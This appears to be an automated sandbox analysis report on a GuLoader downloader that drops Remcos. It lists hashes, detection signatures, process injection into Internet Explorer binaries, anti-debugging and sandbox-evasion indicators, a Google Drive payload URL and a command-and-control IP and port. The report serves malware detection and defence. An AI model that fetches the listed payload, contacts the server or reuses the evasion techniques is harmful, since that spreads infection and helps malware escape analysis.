Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.generic.ml.32161

Overview

General Information

Sample Name:	SecuriteInfo.com.generic.ml.32161 (renamed file extension from 32161 to exe)
Analysis ID:	337336
MD5:	0640f43c412f8f2c3bf6e1b9139db1d0
SHA1:	f07e9e5e618b14b0dd5478cb2a26f42096a10e1d
SHA256:	1664c6a330c5b318458518ea71b2a9995a91c79281a050278c3aa2388663a986
Tags:	GuLoader
Most interesting Screenshot:

Detection

Remcos GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Potential malicious icon found

Sigma detected: Remcos

Yara detected GuLoader

Connects to many ports of the same IP (likely port scanning)

Contains functionality to hide a thread from the debugger

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

SecuriteInfo.com.generic.ml.exe (PID: 908 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: 0640F43C412F8F2C3BF6E1B9139DB1D0)

ieinstal.exe (PID: 6588 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 6612 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 6640 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 6680 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 6724 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 6776 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 6848 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 6908 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 6988 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 7012 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ielowutil.exe (PID: 7084 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe' MD5: D1F5C3244A69511CAC88009B71884A71)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000016.00000002.570071221.0000000002AD1000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0xce8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000000.00000000.205779909.0000000000409000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0xce8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Process Memory Space: ielowutil.exe PID: 7084	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: SecuriteInfo.com.generic.ml.exe PID: 908	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security

Sigma Overview

System Summary:

Sigma detected: Remcos

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Internet Explorer\ielowutil.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.generic.ml.exe

Virustotal: Detection: 11%

Perma Link

Source: SecuriteInfo.com.generic.ml.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 142.250.180.97:443 -> 192.168.2.3:49732 version: TLS 1.2

Networking:

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 185.157.161.61 ports 0,2,52360,3,5,6

Source: global traffic

TCP traffic: 192.168.2.3:49733 -> 185.157.161.61:52360

Source: Joe Sandbox View

IP Address: 142.250.180.97 142.250.180.97

Source: Joe Sandbox View

ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: doc-0c-8c-docs.googleusercontent.com

Source: ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2
Source: ielowutil.exe, 00000016.00000003.540935394.0000000002FAE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: ielowutil.exe, 00000016.00000003.540935394.0000000002FAE000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ielowutil.exe	String found in binary or memory: https://drive.google.com/uc?export=download&id=1LZsqqMCLui4uAjpAqMIbGbmi-9F8VM3f
Source: ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	String found in binary or memory: https://pki.goog/r
Source: ielowutil.exe, 00000016.00000003.540935394.0000000002FAE000.00000004.00000001.sdmp	String found in binary or memory: https://pki.goog/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443

Source: unknown

HTTPS traffic detected: 142.250.180.97:443 -> 192.168.2.3:49732 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000000.205779909.0000000000409000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F536B NtSetInformationThread,	0_2_021F536B
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F0399 EnumWindows,NtSetInformationThread,	0_2_021F0399
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F58B4 NtProtectVirtualMemory,	0_2_021F58B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F20D3 NtWriteVirtualMemory,Sleep,	0_2_021F20D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F22D5 NtWriteVirtualMemory,	0_2_021F22D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F2315 NtWriteVirtualMemory,	0_2_021F2315
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F4B05 NtSetInformationThread,	0_2_021F4B05
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F2385 NtWriteVirtualMemory,	0_2_021F2385
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F23C1 NtWriteVirtualMemory,	0_2_021F23C1
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F48EE NtSetInformationThread,	0_2_021F48EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F20E1 NtWriteVirtualMemory,	0_2_021F20E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F2119 NtWriteVirtualMemory,	0_2_021F2119
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F216D NtWriteVirtualMemory,	0_2_021F216D
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F2189 NtWriteVirtualMemory,	0_2_021F2189
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F21C5 NtWriteVirtualMemory,	0_2_021F21C5
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F21F1 NtWriteVirtualMemory,	0_2_021F21F1
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F1F98 NtSetInformationThread,	0_2_021F1F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F2415 NtWriteVirtualMemory,	0_2_021F2415
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F042D NtSetInformationThread,	0_2_021F042D
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F2445 NtWriteVirtualMemory,	0_2_021F2445
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F2495 NtWriteVirtualMemory,	0_2_021F2495
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F0485 NtSetInformationThread,	0_2_021F0485
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F04AD NtSetInformationThread,	0_2_021F04AD
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F24CD NtWriteVirtualMemory,	0_2_021F24CD
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F24ED NtWriteVirtualMemory,	0_2_021F24ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F0D39 NtSetInformationThread,NtWriteVirtualMemory,	0_2_021F0D39
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5D3D NtSetInformationThread,	22_2_02AD5D3D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD602D NtSetInformationThread,	22_2_02AD602D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD601D NtSetInformationThread,	22_2_02AD601D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5E8D NtSetInformationThread,	22_2_02AD5E8D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5EE2 NtSetInformationThread,	22_2_02AD5EE2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5E39 NtSetInformationThread,	22_2_02AD5E39
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5E19 NtSetInformationThread,	22_2_02AD5E19
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5E71 NtSetInformationThread,	22_2_02AD5E71
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5FB9 NtSetInformationThread,	22_2_02AD5FB9
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5F89 NtSetInformationThread,	22_2_02AD5F89
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5F2D NtSetInformationThread,	22_2_02AD5F2D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5DA9 NtSetInformationThread,	22_2_02AD5DA9
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5D81 NtSetInformationThread,	22_2_02AD5D81
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5D95 NtSetInformationThread,	22_2_02AD5D95
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5DDD NtSetInformationThread,	22_2_02AD5DDD
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD5D69 NtSetInformationThread,	22_2_02AD5D69

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe

Code function: 0_2_004012D4

0_2_004012D4

Source: SecuriteInfo.com.generic.ml.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.generic.ml.exe, 00000000.00000000.205786428.0000000000411000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIndk.exe vs SecuriteInfo.com.generic.ml.exe
Source: SecuriteInfo.com.generic.ml.exe	Binary or memory string: OriginalFilenameIndk.exe vs SecuriteInfo.com.generic.ml.exe

Source: SecuriteInfo.com.generic.ml.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000000.205779909.0000000000409000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@25/1@3/2

Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-DPTVOE

Source: SecuriteInfo.com.generic.ml.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: SecuriteInfo.com.generic.ml.exe

Virustotal: Detection: 11%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000016.00000002.570071221.0000000002AD1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ielowutil.exe PID: 7084, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.generic.ml.exe PID: 908, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_004069D1 push ss; retf	0_2_00406A0D
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_004066E0 push ss; retf	0_2_00406A0D
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_004043BD push ebp; iretd	0_2_004043C1

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: SecuriteInfo.com.generic.ml.exe, 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, ielowutil.exe, 00000016.00000002.570071221.0000000002AD1000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEU
Source: SecuriteInfo.com.generic.ml.exe, ielowutil.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe

Code function: 0_2_021F536B rdtsc

0_2_021F536B

Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe

Window / User API: threadDelayed 700

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe TID: 1376	Thread sleep count: 700 > 30			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe TID: 1376	Thread sleep time: -7000000s >= -30000s			Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe

Last function: Thread delayed

Source: SecuriteInfo.com.generic.ml.exe, ielowutil.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.generic.ml.exe, 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, ielowutil.exe, 00000016.00000002.570071221.0000000002AD1000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeU

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe

Code function: 0_2_021F536B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489

0_2_021F536B

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe

Code function: 0_2_021F536B rdtsc

0_2_021F536B

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe

Code function: 0_2_021F362C LdrInitializeThunk,

0_2_021F362C

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_004012D4 mov ebx, dword ptr fs:[00000030h]	0_2_004012D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F536B mov eax, dword ptr fs:[00000030h]	0_2_021F536B
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F4A29 mov eax, dword ptr fs:[00000030h]	0_2_021F4A29
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F1AA5 mov eax, dword ptr fs:[00000030h]	0_2_021F1AA5
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F4358 mov eax, dword ptr fs:[00000030h]	0_2_021F4358
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F53B5 mov eax, dword ptr fs:[00000030h]	0_2_021F53B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F291E mov eax, dword ptr fs:[00000030h]	0_2_021F291E
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F1C59 mov eax, dword ptr fs:[00000030h]	0_2_021F1C59
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F1C71 mov eax, dword ptr fs:[00000030h]	0_2_021F1C71
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Code function: 0_2_021F15CB mov eax, dword ptr fs:[00000030h]	0_2_021F15CB
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD4A29 mov eax, dword ptr fs:[00000030h]	22_2_02AD4A29
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD53B5 mov eax, dword ptr fs:[00000030h]	22_2_02AD53B5
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD536B mov eax, dword ptr fs:[00000030h]	22_2_02AD536B
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD4358 mov eax, dword ptr fs:[00000030h]	22_2_02AD4358
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe	Code function: 22_2_02AD2917 mov eax, dword ptr fs:[00000030h]	22_2_02AD2917

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe

Memory written: C:\Program Files (x86)\Internet Explorer\ielowutil.exe base: 2AD0000

Jump to behavior

